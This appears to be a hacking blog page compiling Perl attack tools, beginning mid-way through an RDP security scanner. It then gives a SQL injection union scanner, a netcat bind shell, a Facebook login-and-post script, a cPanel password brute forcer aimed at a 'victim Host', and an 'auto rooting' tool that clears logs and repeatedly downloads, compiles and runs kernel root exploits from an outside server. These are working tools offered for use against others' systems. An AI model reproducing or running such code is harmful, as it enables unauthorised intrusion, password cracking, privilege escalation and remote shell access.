		print "Not supported - unexpected response\n";
		$config{"protocols"}{"PROTOCOL_HYBRID"} = 0;
	} 
	print "\n";
	print "[+] Checking RDP Security Layer\n\n";
	foreach my $enc_hex (qw(00 01 02 08 10)) {
		printf "[-] Checking RDP Security Layer with encryption %s...", $encryption_method{"000000" . $enc_hex};
		$socket = get_socket($ip, $port);
		@response = test_classic_rdp_security($socket);
	
		if (scalar @response == 11) {
			my @response_mcs = test_mcs_initial_connect($socket, $enc_hex);
			unless (scalar(@response_mcs) > 8) {
				print "Not supported\n";
				next;
			}
			my $length1 = ord($response_mcs[8]);
			my $ber_encoded = join("", splice @response_mcs, 7);
			my $ber = $enc->decode($ber_encoded);
			my $user_data = $ber->{value}->[3]->{value};
			my ($sc_core, $sc_sec) = $user_data =~ /\x01\x0c..(.*)\x02\x0c..(.*)/s;
			
			my ($version, $client_requested_protocols, $early_capability_flags) = $sc_core =~ /(....)(....)?(....)?/;
			my ($encryption_method, $encryption_level, $random_length, $server_cert_length) = $sc_sec =~ /(....)(....)(....)(....)/;
			my $server_cert_length_i = unpack("V", $server_cert_length);
			my $random_length_i = unpack("V", $random_length);
			if ("000000" . $enc_hex eq sprintf "%08x", unpack("V", $encryption_method)) {
				printf "Supported.  Server encryption level: %s\n", $encryption_level{sprintf "%08x", unpack("V", $encryption_level)};
				$config{"encryption_level"}{$encryption_level{sprintf "%08x", unpack("V", $encryption_level)}} = 1;
				$config{"encryption_method"}{$encryption_method{sprintf "%08x", unpack("V", $encryption_method)}} = 1;
				$config{"protocols"}{"PROTOCOL_RDP"} = 1; # This is the only way the script detects RDP support on 2000/XP
			} else {
				printf "Not supported.  Negotiated %s.  Server encryption level: %s\n", $encryption_method{sprintf "%08x", unpack("V", $encryption_method)}, $encryption_level{sprintf "%08x", unpack("V", $encryption_level)};
				$config{"encryption_level"}{$encryption_level{sprintf "%08x", unpack("V", $encryption_level)}} = 0;
				$config{"encryption_method"}{$encryption_method{sprintf "%08x", unpack("V", $encryption_method)}} = 0;
			}
			my $random = substr $sc_sec, 16, $random_length_i;	
			my $cert = substr $sc_sec, 16 + $random_length_i, $server_cert_length_i;	
		} else {
			print "Not supported\n";
		}
	}

	if ($config{"protocols"}{"PROTOCOL_HYBRID"}) {
		if ($config{"protocols"}{"PROTOCOL_SSL"} or $config{"protocols"}{"PROTOCOL_RDP"}) {	
			$config{"issues"}{"NLA_SUPPORTED_BUT_NOT_MANDATED_DOS"} = 1;
		}
	} else {
		# is this really a problem?
		$config{"issues"}{"NLA_NOT_SUPPORTED_DOS"} = 1;
	}

	if ($config{"protocols"}{"PROTOCOL_RDP"}) {
		if ($config{"protocols"}{"PROTOCOL_SSL"} or $config{"protocols"}{"PROTOCOL_HYBRID"}) {	
			$config{"issues"}{"SSL_SUPPORTED_BUT_NOT_MANDATED_MITM"} = 1;
		} else {
			$config{"issues"}{"ONLY_RDP_SUPPORTED_MITM"} = 1;
		}

		if ($config{"encryption_method"}{"ENCRYPTION_METHOD_40BIT"} or $config{"encryption_method"}{"ENCRYPTION_METHOD_56BIT"}) {
			$config{"issues"}{"WEAK_RDP_ENCRYPTION_SUPPORTED"} = 1;
		}

		if ($config{"encryption_method"}{"ENCRYPTION_METHOD_NONE"}) {
			$config{"issues"}{"NULL_RDP_ENCRYPTION_SUPPORTED"} = 1;
		}

		if ($config{"encryption_method"}{"ENCRYPTION_METHOD_FIPS"} and ($config{"encryption_method"}{"ENCRYPTION_METHOD_NONE"} or $config{"encryption_method"}{"ENCRYPTION_METHOD_40BIT"} or $config{"encryption_method"}{"ENCRYPTION_METHOD_56BIT"} or $config{"encryption_method"}{"ENCRYPTION_METHOD_128BIT"})) {
			$config{"issues"}{"FIPS_SUPPORTED_BUT_NOT_MANDATED"} = 1;
		}
	}

	print "\n";
	print "[+] Summary of protocol support\n\n";
	foreach my $protocol (keys(%{$config{"protocols"}})) {
		printf "[-] $ip:$port supports %-15s: %s\n", $protocol, $config{"protocols"}{$protocol} ? "TRUE" : "FALSE";
	}

	print "\n";
	print "[+] Summary of RDP encryption support\n\n";
	foreach my $encryption_level (sort keys(%{$config{"encryption_level"}})) {
		printf "[-] $ip:$port has encryption level: %s\n", $encryption_level;
	}
	foreach my $encryption_method (sort keys(%encryption_method)) {
		printf "[-] $ip:$port supports %-25s: %s\n", $encryption_method{$encryption_method}, (defined($config{"encryption_method"}{$encryption_method{$encryption_method}}) and $config{"encryption_method"}{$encryption_method{$encryption_method}}) ? "TRUE" : "FALSE";
	}

	print "\n";
	print "[+] Summary of security issues\n\n";
	foreach my $issue (keys(%{$config{"issues"}})) {
		print "[-] $ip:$port has issue $issue\n";
	}

	print Dumper \%config if $debug;
}

sub test_std_rdp_security {
	my ($socket) = @_;
	my $string = get_x224_crq_std_rdp_security();
	return do_handshake($socket, $string);
}

sub test_tls_security {
	my ($socket) = @_;
	my $string = get_x224_crq_tls_security();
	return do_handshake($socket, $string);
}

sub test_credssp_security {
	my ($socket) = @_;
	my $string = get_x224_crq_credssp_security();
	return do_handshake($socket, $string);
}

sub test_classic_rdp_security {
	my ($socket) = @_;
	my $string = get_x224_crq_classic();
	return do_handshake($socket, $string);
}

sub test_mcs_initial_connect {
	my ($socket, $enc_hex) = @_;
	my $string = get_mcs_initial_connect($enc_hex);
	return do_handshake($socket, $string);
}

sub do_handshake {
	my ($socket, $string) = @_;
	print "[+] Sending:\n" if $debug > 1;
	hdump($string) if $debug > 1;
	
	print $socket $string;
	
	my $data;
	$socket->recv($data,4);
	if (length($data) == 4) {
		print "[+] Received from Server :\n" if $debug > 1;
		hdump($data) if $debug > 1;
		my @data = split("", $data);
		my $length = (ord($data[2]) << 8) + ord($data[3]);
		printf "[+] Initial length: %d\n", $length if $debug > 1;
		my $data2 = "";
		while (length($data) < $length) {
			$socket->recv($data2,$length - 4);
			print "[+] Received " . length($data2) . " bytes from Server :\n" if $debug > 1;
			hdump($data2) if $debug > 1;
			$data .= $data2;
		}
		return split "", $data;
	} else {
		return undef;
	}
}

# http://www.perlmonks.org/?node_id=111481
sub hdump {
    my $offset = 0;
    my(@array,$format);
    foreach my $data (unpack("a16"x(length($_[0])/16)."a*",$_[0])) {
        my($len)=length($data);
        if ($len == 16) {
            @array = unpack('N4', $data);
            $format="0x%08x (%05d)   %08x %08x %08x %08x   %s\n";
        } else {
            @array = unpack('C*', $data);
            $_ = sprintf "%2.2x", $_ for @array;
            push(@array, '  ') while $len++ < 16;
            $format="0x%08x (%05d)" .
               "   %s%s%s%s %s%s%s%s %s%s%s%s %s%s%s%s   %s\n";
        } 
        $data =~ tr/\0-\37\177-\377/./;
        printf $format,$offset,$offset,@array,$data;
        $offset += 16;
    }
}

sub get_x224_crq_std_rdp_security {
	return get_x224_connection_request("00");
}

sub get_x224_crq_tls_security {
	return get_x224_connection_request("01");
}

sub get_x224_crq_credssp_security {
	return get_x224_connection_request("03");
}

sub get_x224_crq_classic {
	return get_old_connection_request();
}

# enc_hex is bitmask of:
# 01 - 40 bit
# 02 - 128 bit
# 08 - 56 bit
# 10 - fips
#
# common value sniffed from wireshark: 03
sub get_mcs_initial_connect {
	my $enc_hex = shift;
	my @packet_hex = qw(
	03 00  01 a2 02 f0 80 7f 65 82
	01 96 04 01 01 04 01 01  01 01 ff 30 20 02 02 00
	22 02 02 00 02 02 02 00  00 02 02 00 01 02 02 00
	00 02 02 00 01 02 02 ff  ff 02 02 00 02 30 20 02
	02 00 01 02 02 00 01 02  02 00 01 02 02 00 01 02
	02 00 00 02 02 00 01 02  02 04 20 02 02 00 02 30
	20 02 02 ff ff 02 02 fc  17 02 02 ff ff 02 02 00
	01 02 02 00 00 02 02 00  01 02 02 ff ff 02 02 00
	02 04 82 01 23 00 05 00  14 7c 00 01 81 1a 00 08
	00 10 00 01 c0 00 44 75  63 61 81 0c 01 c0 d4 00
	04 00 08 00 20 03 58 02  01 ca 03 aa 09 04 00 00
	28 0a 00 00 68 00 6f 00  73 00 74 00 00 00 00 00
	00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00
	00 00 00 00 04 00 00 00  00 00 00 00 0c 00 00 00
	00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00
	00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00
	00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00
	00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00
	01 ca 01 00 00 00 00 00  18 00 07 00 01 00 00 00
	00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00
	00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00
	00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00
	00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00
	04 c0 0c 00 09 00 00 00  00 00 00 00 02 c0 0c 00
	);
	push @packet_hex, $enc_hex;
	push @packet_hex, qw(00 00 00 00 00 00 00  03 c0 20 00 02 00 00 00
	63 6c 69 70 72 64 72 00  c0 a0 00 00 72 64 70 64
	72 00 00 00 80 80 00 00                         
	);
	my $string = join("", @packet_hex);
	$string =~ s/(..)/sprintf("%c", hex($1))/ge;
	return $string;
}

# MS-RDPBCGR
sub get_x224_connection_request {
	my $sec = shift;
	my @packet_hex;
	push @packet_hex, qw(03); # tpktHeader - version
	push @packet_hex, qw(00); # tpktHeader - reserved
	push @packet_hex, qw(00 13); # tpktHeader - length
	push @packet_hex, qw(0e); # x224Crq - length
	push @packet_hex, qw(e0); # x224Crq - connection request
	push @packet_hex, qw(00 00); # x224Crq - ??
	push @packet_hex, qw(00 00); # x224Crq - src-ref
	push @packet_hex, qw(00); # x224Crq - class
	push @packet_hex, qw(01); # rdpNegData - type
	push @packet_hex, qw(00); # rdpNegData - flags
	push @packet_hex, qw(08 00); # rdpNegData - length
	push @packet_hex, ($sec, qw(00 00  00)); # rdpNegData - requestedProtocols.  bitmask, little endian: 0=standard rdp security, 1=TLSv1, 2=Hybrid (CredSSP)

	my $string = join("", @packet_hex);
	$string =~ s/(..)/sprintf("%c", hex($1))/ge;
	return $string;
}

sub get_old_connection_request {
	my @packet_hex = qw(
		03 00  00 22 1d e0 00 00 00 00
		00 43 6f 6f 6b 69 65 3a  20 6d 73 74 73 68 61 73
		68 3d 72 6f 6f 74 0d 0a                        
	);
	my $string = join("", @packet_hex);
	$string =~ s/(..)/sprintf("%c", hex($1))/ge;
	return $string;
}

sub get_socket {
	my ($ip, $port) = @_;
	my $socket = new IO::Socket::INET (
		PeerHost => $ip,
		PeerPort => $port,
		Proto => 'tcp',
	) or die "ERROR in Socket Creation : $!\n";
	return $socket;
}

sub print_section {
        my ($string) = @_;
        print "\n=== $string ===\n\n";
}

sub resolve {
        my $hostname = shift;
        print "[D] Resolving $hostname\n" if $debug > 0;
        my $ip =  gethostbyname($hostname);
        if (defined($ip)) {
                return inet_ntoa($ip);
        } else {
                return undef;
        }
}

Baca Selengkapnya... RDP Scanner Protocol

Search Bug SQL injection union

#!/usr/bin/perl
#Make By NoNam3
#My Blog is D4wFl1N@blogspot.com
use strict;
use warnings;
use LWP::UserAgent;

my $ua=LWP::UserAgent->new();
$ua->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4");

my $cargv=@ARGV;
if ($cargv!=1) {
	print "ARGV wrong please check\nTheme:\n";
	exit;
}

(my $target)=@ARGV;
my $i=1;
my $url=$target.'+and+1=2+union+select+concat(0x426f6e6774726f70,'.$i.',0x426f6e6774726f70)';
my $respone=$ua->get($url.'--');
my $content=$respone->content;

print "[+] Start Scan\n\n";
while (!($content=~/Bongtrop(.*?)Bongtrop/)) {
	$i++;
	$url.=',concat(0x426f6e6774726f70,';
	$url.="$i";
	$url.=',0x426f6e6774726f70)';
	$respone=$ua->get($url.'--');
	$content=$respone->content;
	if ($i==100) {
		print "[-] Don't Have Bug\n\n";
		print "Make By Pongsakorn";
		exit;
	}
}
(my $magic)=$content=~/Bongtrop(.*?)Bongtrop/;

print "[+] Max Number is $i\n[+] Bug Number is $magic\n\n";
print "Make By NoNam3\n";

Baca Selengkapnya... Search Bug SQL injection union

Self-Killing Perl Shell Through Netcat

#!/usr/bin/perl -w

# save in /bin/selfkill
# calls itself with argument in order to complete process and open up $portnum 
# with prompt for $lifetime seconds

$| = 1;
$lifetime = 60; # in seconds
my $prompt = '[me@selfkill]$ ';
my $portnum = 35898; # can be anything within port range

# create file that deletes itself on completion
system('echo -e "#!/bin/bash\nexec /bin/selfkill run\nexec /bin/rm $0" > /tmp/selfkill; chmod +x /tmp/selfkill');

# exec if /tmp/selfkill has no args (will be called from self-call above)
if(!@ARGV){ exec("nc -e /tmp/selfkill -l -p $portnum"); die; }

# set reasonable path
$ENV{'PATH'} = '/sbin:/usr/sbin:/bin:/usr/bin:/usr/X11R6/bin:/usr/local/bin:/usr/local/sbin:.';

while(1){
  print $prompt;
  eval {
    local $SIG{ALRM} = sub { die 'Goodbye!\n'; };

    alarm $lifetime;
    &syscall;
    alarm 0;
  };
  # shell not used for 60 seconds so die
  if( $@ ){ die; }
}

sub syscall{
  if( defined( $_ =  )){
    chomp;
    system( $_ );
  }
}

Baca Selengkapnya... Self-Killing Perl Shell Through Netcat

Facebook.pl Ver 1.0

#!/usr/bin/perl -w

#
# Facebook.pl (1.0)
#
# Description:
# Functions to use Facebook
# without Graph API (nor
# Facebook apps, access tokens,
# etc).
#
# Changes history:
# Not today.
#
# License:
# Public Domain.
#
# sud0 
# http://sud0.unitedhack.com
#

use strict;
use IO::Socket;
use Encode;

# Cookies
my $cookies;

# fbwall
my $fb_dtsg;
my $xhpc_targetid;
my $xhpc_composerid;
my $c_user;

# http
my $EOL = "\015\012";
my $BLANK = $EOL x 2;

sub fbclose {
	undef($cookies);
	undef($fb_dtsg);
	undef($xhpc_targetid);
	undef($xhpc_composerid);
	undef($c_user);
}

sub fbcheck {
	if (defined($cookies)) {
		return 1;
	}
	else {
		return 0;
	}
}

sub fbget {
	my $url = shift;
	my $cookie = shift;
	if (defined($url) && defined($cookie) && $url ne "") {
		# Loop
		while (1) {
			my $datos;
			my $sock = IO::Socket::INET->new(PeerAddr =>"www.facebook.com", PeerPort =>"http(80)", Proto => "tcp");
			unless ($sock) {
				fbclose();
				die "Connection error\n";
			}
			$sock->autoflush(1);
			print $sock "GET $url HTTP/1.1" . $EOL;
			print $sock "Host: www.facebook.com" . $EOL;
			print $sock "User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.1b3pre) Gecko/20081130 Minefield/3.1b3pre" . $EOL;
			print $sock "Accept: text/html,application/xhtml+xml,application/xml,application/ecmascript,text/javascript,text/jscript;q=0.9,*/*;q=0.8" . $EOL;
			print $sock "Accept-Language: en-us,en;q=0.5" . $EOL;
			print $sock "Accept-Encoding: deflate" . $EOL;
			print $sock "Accept-Charset: UTF-8;q=0.7,*;q=0.7" . $EOL;
			if ($cookie ne "") {
				print $sock "Cookie: $cookie" . $EOL;
			}
			print $sock "Connection: close" . $BLANK;
			while (<$sock>) {
				$datos = "$datos$_";
			}
			if ($datos =~ /Location: (.*?)$EOL/o) {
				$url = $1;
				close $sock;
				# Back to loop
			}
			else {
				close $sock;
				# Decode it for your own needs.
				#$datos = decode("utf-8", $datos);
				return "$datos";
			}
		}
	}
	else {
		die "URL/cookie/body unspecified\n";
	}
}

sub fbpost {
	my $url = shift;
	my $cookie = shift;
	my $cuerpo = shift;
	if (defined($url) && defined($cookie) && defined($cuerpo) && $url ne "" && $cuerpo ne "") {
		# HTTP POST
		my $datos;
		$cuerpo = encode("utf-8", $cuerpo);
		my $sock = IO::Socket::INET->new(PeerAddr =>"www.facebook.com", PeerPort =>"http(80)", Proto => "tcp");
		unless ($sock) {
			fbclose();
			die "Connection error\n";
		}
		$sock->autoflush(1);
		print $sock "POST $url HTTP/1.1" . $EOL;
		print $sock "Host: www.facebook.com" . $EOL;
		print $sock "User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.1b3pre) Gecko/20081130 Minefield/3.1b3pre" . $EOL;
		print $sock "Content-Length: ".$cuerpo =~ s/(.)/$1/sg."" . $EOL;
		print $sock "Content-Type: application/x-www-form-urlencoded" . $EOL;
		if ($cookie ne "") {
			print $sock "Cookie: $cookie" . $EOL;
		}
		print $sock "Connection: close" . $BLANK;
		print $sock "$cuerpo" . $EOL;
		while (<$sock>) {
			$datos = "$datos$_";
		}
		close $sock;
		return $datos;
	}
	else {
		die "URL/cookie/cuerpo unspecified\n";
	}
}

sub fblogin {
	my $email = shift;
	my $pass = shift;
	if (defined($email) && defined($pass) && $email ne "" && $pass ne "") {
		fbclose();
		my $datos;
		unless (eval {$datos = fbpost("/login.php?login_attempt=1", "reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Flogin.php%3Flogin_attempt%3D1; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Flogin.php%3Flogin_attempt%3D1", "email=$email&pass=$pass");}) {
			fbclose();
			chop $@;
			die "$@\n";
		}
		if ($datos =~ /302 Found/) {
			# We're in
			# Getting cookies...
			for (split /$EOL/, $datos) {
				my $cookie1 = $_;
				$cookie1 =~ s/\s+$//;
				if ($cookie1 =~ /Set-Cookie: (.*)/) {
					my $cookie2 = $1;
					if ($cookie2 !~ /deleted/) {
						my @cookie3 = split(" ", $cookie2);
						if (defined($cookies)) {
							$cookies = "$cookies $cookie3[0]";
						}
						else {
							$cookies = "$cookie3[0]";
						}
					}
				}
			}
			$cookies =~ s/\;+$//g;
			unless (eval {$datos = fbget("/", "$cookies");}) {
				fbclose();
				chop $@;
				die "$@\n";
			}
			if ($cookies =~ /c_user=(.*?)\;/o) {
				$c_user = $1;
			}
			else {
				fbclose();
				die "Unexpected error\n";
			}
			if ($datos =~ /name=\"fb_dtsg\" value=\"(.*?)\"/o) {
				$fb_dtsg = $1;
			}
			else {
				fbclose();
				die "Unexpected error\n";
			}
			if ($datos =~ /name=\"xhpc_targetid\" value=\"(.*?)\"/o) {
				$xhpc_targetid = $1;
			}
			else {
				fbclose();
				die "Unexpected error\n";
			}
			if ($datos =~ /name=\"xhpc_composerid\" value=\"(.*?)\"/o) {
				$xhpc_composerid = $1;
			}
			else {
				fbclose();
				die "Unexpected error\n";
			}
			return 1;
		}
		else {
			# Facebook says: Nope!
			die "Wrong username/password\n";
		}
	}
	else {
		die "Username/password unspecified\n";
	}
}

sub fbwall {
	my $mensaje = shift;
	my $target = shift;
	if (defined($cookies) && defined($mensaje) && $mensaje ne "") {
		# $xhpc_targetid (actual)
		# Can be a friend/page too.
		my $datos;
		$mensaje =~ s/\\n/\%0A/g;
		$mensaje =~ s/
/\%0A/g;
		if (defined($target) && $target ne "") {
			unless(eval {$datos = fbpost("/ajax/updatestatus.php", "$cookies", "fb_dtsg=$fb_dtsg&xhpc_targetid=$target&xhpc_context=home&xhpc_ismeta=1&xhpc_fbx=1&xhpc_timeline=&xhpc_composerid=$xhpc_composerid&xhpc_message_text=$mensaje&xhpc_message=$mensaje&is_explicit_place=&composertags_place=&composertags_place_name=&composer_session_id=&composertags_city=&disable_location_sharing=false&composer_predicted_city=&audience[0][value]=80&nctr[_mod]=pagelet_composer&__user=$c_user&__a=1");}) {
				fbclose();
				chop $@;
				die "$@\n";
			}
			
		}
		else {
			unless(eval {$datos = fbpost("/ajax/updatestatus.php", "$cookies", "fb_dtsg=$fb_dtsg&xhpc_targetid=$xhpc_targetid&xhpc_context=home&xhpc_ismeta=1&xhpc_fbx=1&xhpc_timeline=&xhpc_composerid=$xhpc_composerid&xhpc_message_text=$mensaje&xhpc_message=$mensaje&is_explicit_place=&composertags_place=&composertags_place_name=&composer_session_id=&composertags_city=&disable_location_sharing=false&composer_predicted_city=&audience[0][value]=80&nctr[_mod]=pagelet_composer&__user=$c_user&__a=1");}) {
				fbclose();
				chop $@;
				die "$@\n";
			}
		}
		if ($datos =~ /errorSummary/) {
			die "Failed to publish message\n";
		}
		return 1;
	}
	else {
		die "Cookies/message unspecified\n";
	}
}
# EOF

Baca Selengkapnya... Facebook.pl Ver 1.0

Cpanel Password Brute Forcer

#!/usr/bin/perl
# Cpanel Password Brute Forcer
# ----------------------------
# (c)oded By 3lim
# Perl Version ( low speed )
# Oerginal Advisory :
use IO::Socket;
use LWP::Simple;
use MIME::Base64;

$host = $ARGV[0];
$user = $ARGV[1];
$port = $ARGV[2];
$list = $ARGV[3];
$file = $ARGV[4];
$url = "http://".$host.":".$port;
if(@ARGV < 3){
print q(
###############################################################
# Cpanel Password Brute Force Tool #
###############################################################
# usage : cpanel.pl [HOST] [User] [PORT][list] [File] #
#-------------------------------------------------------------#
# [Host] : victim Host (simorgh-ev.com) #
# [User] : User Name (demo) #
# [PORT] : Port of Cpanel (2082) #
#[list] : File Of password list (list.txt) #
# [File] : file for save password (password.txt) #
# #
###############################################################
# (c)oded By 3lim / Back Track #
###############################################################
);exit;}

headx();

$numstart = "-1";

sub headx() {
print q(
###############################################################
# Cpanel Password Brute Force Tool #
# (c)oded By 3lim / Back Track #
###############################################################
);
open (PASSFILE, "<$list") || die "[-] Can't open the List of password file !";
@PASSWORDS = ;
close PASSFILE;
foreach my $P (@PASSWORDS) {
chomp $P;
$passwd = $P;
print "
[~] Try Password : $passwd
";
&brut;
};
}
sub brut() {
$authx = encode_base64($user.":".$passwd);
print $authx;
my $sock = IO::Socket::INET->new(Proto => "tcp",PeerAddr => "$host", PeerPort => "$port") || print "
[-] Can not connect to the host";
print $sock "GET / HTTP/1.1
";
print $sock "Authorization: Basic $authx
";
print $sock "Connection: Close

";
read $sock, $answer, 128;
close($sock);

if ($answer =~ /Moved/) {
print "
[~] PASSWORD FOUND : $passwd
";
exit();
}
}

Baca Selengkapnya... Cpanel Password Brute Forcer

Viper Auto Rooting Ver.2.0

#!/usr/bin/perl
#
#        ==>> Viper Auto Rooting <<==
#
#
#    ---------------------------------------------------------------------------------------------------------------------------
#    Script : Perl
#    By : Bl4ck.Viper
#    From : Azarbycan (Turkish Man)(fardin Allahverdinajhand)
#    Contact : Bl4ck.Viper@Gmail.Com , Bl4ck.Viper@Hotmail.Com , Bl4ck.Viper@Yahoo.Com
#    Version : 2.0
#    For Black Hat & Real Hackers
#    ---------------------------------------------------------------------------------------------------------------------------
#    ---------------------------------------------------------------------------------------------------------------------------
#    For All Version Of Linux , SunOS , MacOS X , FreeBSD
#    ---------------------------------------------------------------------------------------------------------------------------
#
print "\t\t\tViper Auto Rooting\n";
print "\t\t\tVersion : 2.0\n";
print "\n";
print "\n\n";
print "\t\t------------------------------------\n";
print "\t\t\tCoded By Bl4ck.Viper\n";
print "\t\t------------------------------------\n";
print "\t\t For See Commands type [help] :D\n";
print "\n";
command:;
print 'Viper@Localr00t#:';
$command = ;
if ($command =~ /help/){
goto help
}
if ($command =~ /sysline/){
goto sysline
}
if ($command =~ /varline/){
goto varline
}
if ($command =~ /gccinfo/){
goto gccinfo
}
if ($command =~ /sysinfo/){
goto sysinfo
}
if ($command =~ /logc/){
goto logc
}
if ($command =~ /config/){
goto config
}
if ($command =~ /logs/){
goto logs
}
if ($command =~ /sysproc/){
goto sysproc
}
if ($command =~ /all/){
goto all
}
if ($command =~ /2.2.x/){
goto local2
}
if ($command =~ /2.4.x/){
goto local4
}
if ($command =~ /2.6.x/){
goto local6
}
if ($command =~ /freebsd-x/){
goto freebsd
}
if ($command =~ /mac-os-x/){
goto mac
}
if ($command =~ /red-x/){
goto red
}
if ($command =~ /sunos-x/){
goto sun
}
else{
print "Unknow Command !\n";
goto command
};
help:;
print "\t--------------------------------------------------------\n";
print "\t\tsysline\t\t[Go To System Command Line]\n";
print "\t\tvarline\t\t[Go To var.pl Command Line]\n";
print "\t\tsysinfo\t\t[Show System Information]\n";
print "\t\tsysproc\t\t[Show Running Proccess's]\n";
print "\t\tconfig\t\t[Show Config File]\n";
print "\t\tlogs\t\t[Show System Log File]\n";
print "\t\tall\t\t[Show All Localroots In Database]\n";
print "\t\tgccinfo\t\t[Check For gcc Installed Or Not Installed]\n";
print "\t\tlogc\t\t[Clear Server Log]\n";
print "\t\t2.2.x\t\t[Localroots of 2.2.x]\n";
print "\t\t2.4.x\t\t[Localroots of 2.4.x]\n";
print "\t\t2.6.x\t\t[Localroots of 2.6.x]\n";
print "\t\tfreebsd-x\t[Localroots of FreeBSD]\n";
print "\t\tmac-os-x\t[Localroots of MacOS X]\n";
print "\t\tred-x\t\t[Localroots of RedHat]\n";
print "\t\tsunos-x\t\t[Localroots of Sun Solaris OS]\n";
print "\t--------------------------------------------------------\n";
print "\n";
goto command;
sysline:;
print "system:";
$systemm = <>;
if ($systemm =~ /varline/){
goto varline
}
system("$systemm");
goto sysline;
varline:;
goto command;
all:;
print q{
2.2.27
2.2.x
2.4 2.6
2.4.17
2.4.18
2.4.19
2.4.20
2.4.21
2.4.22
2.4.22-10
2.4.23
2.4.24
2.4.25
2.4.26
2.4.29
2.4.x
2.6.2
2.6.4
2.6.5
2.6.7
2.6.8
2.6.9
2.6.9-22.sh
2.6.9-34
2.6.9-55
2.6.10
2.6.11
2.6.12
2.6.13
2.6.13-17-2
2.6.13-17-3
2.6.14
2.6.15
2.6.16
2.6.17
2.6.x
FreeBSD 4.4 - 4.6
FreeBSD 4.8
FreeBSD 5.3
Mac OS X
red-7.3
red-8.0
red-hat8.0-2
redhat 7.0
redhat 7.1
SunOS 5.7
SunOS 5.8
SunOS 5.9
SunOS 5.10
};
print "\n";
goto command;
local2:;
print "\t\tWelcome To 2.2.x Section\n";
system ("cd /tmp;mkdir 2.2.x;chmod 777 2.2.x;cd 2.2.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.2.x/elfcd1.c;gcc elfcd1.c -o elfcd1;chmod 777 elfcd1;./elfcd1");
system ("cd /tmp;mkdir 2.2.x;chmod 777 2.2.x;cd 2.2.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.2.x/mremap_pte;chmod 777 mremap_pte;./mremap_pte");
system ("cd /tmp;mkdir 2.2.x;chmod 777 2.2.x;cd 2.2.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.2.x/uselib24;chmod 777 uselib24;./uselib24");
system ("cd /tmp;mkdir 2.2.x;chmod 777 2.2.x;cd 2.2.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.2.x/ptrace24;chmod 777 ptrace24;./ptrace24");
system ("id");
local4:;
system ("cd /tmp;mkdir 2.4.x;chmod 777 2.4.x;cd 2.4.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.4.x/pwned.c;gcc pwned.c -o pwned;chmod 777 pwned;./pwned");
system ("cd /tmp;mkdir 2.4.x;chmod 777 2.4.x;cd 2.4.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.4.x/kmod;chmod 777 kmod;./kmod");
system ("cd /tmp;mkdir 2.4.x;chmod 777 2.4.x;cd 2.4.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.4.x/newlocal;chmod 777 newlocal;./newlocal");
system ("cd /tmp;mkdir 2.4.x;chmod 777 2.4.x;cd 2.4.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.4.x/uselib24;chmod 777 uselib24;./uselib24");
system ("cd /tmp;mkdir 2.4.x;chmod 777 2.4.x;cd 2.4.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.4.x/brk;chmod 777 brk;./brk");
system ("cd /tmp;mkdir 2.4.x;chmod 777 2.4.x;cd 2.4.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.4.x/brk2;chmod 777 brk2;./brk2");
system ("cd /tmp;mkdir 2.4.x;chmod 777 2.4.x;cd 2.4.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.4.x/ptrace;chmod 777 ptrace;./ptrace");
system ("cd /tmp;mkdir 2.4.x;chmod 777 2.4.x;cd 2.4.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.4.x/ptrace-kmod;chmod 777 ptrace-kmod;./ptrace-kmod");
system ("cd /tmp;mkdir 2.4.x;chmod 777 2.4.x;cd 2.4.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.4.x/2.4.22.c;gcc 2.4.22.c -o 2.4.22;chmod 777 2.4.22;./2.4.22");
system ("cd /tmp;mkdir 2.4.x;chmod 777 2.4.x;cd 2.4.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.4.x/loginx;chmod 777 loginx;./loginx");
system ("cd /tmp;mkdir 2.4.x;chmod 777 2.4.x;cd 2.4.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.4.x/hatorihanzo.c;gcc hatorihanzo.c -o hatorihanzo;chmod 777 hatorihanzo;./hatorihanzo");
system ("cd /tmp;mkdir 2.4.x;chmod 777 2.4.x;cd 2.4.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.4.x/mremap_pte;chmod 777 mremap_pte;./mremap_pte");
system ("cd /tmp;mkdir 2.4.x;chmod 777 2.4.x;cd 2.4.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.4.x/Linux-kernel-mremap.c;gcc Linux-kernel-mremap.c -o Linux-kernel-mremap;chmod 777 Linux-kernel-mremap;./Linux-kernel-mremap");
system ("cd /tmp;mkdir 2.4.x;chmod 777 2.4.x;cd 2.4.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.4.x/uselib24;chmod 777 uselib24;./uselib24");
system ("cd /tmp;mkdir 2.4.x;chmod 777 2.4.x;cd 2.4.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.4.x/expand_stack.c;gcc expand_stack.c -o expand_stack;chmod 777 expand_stack;./expand_stack");
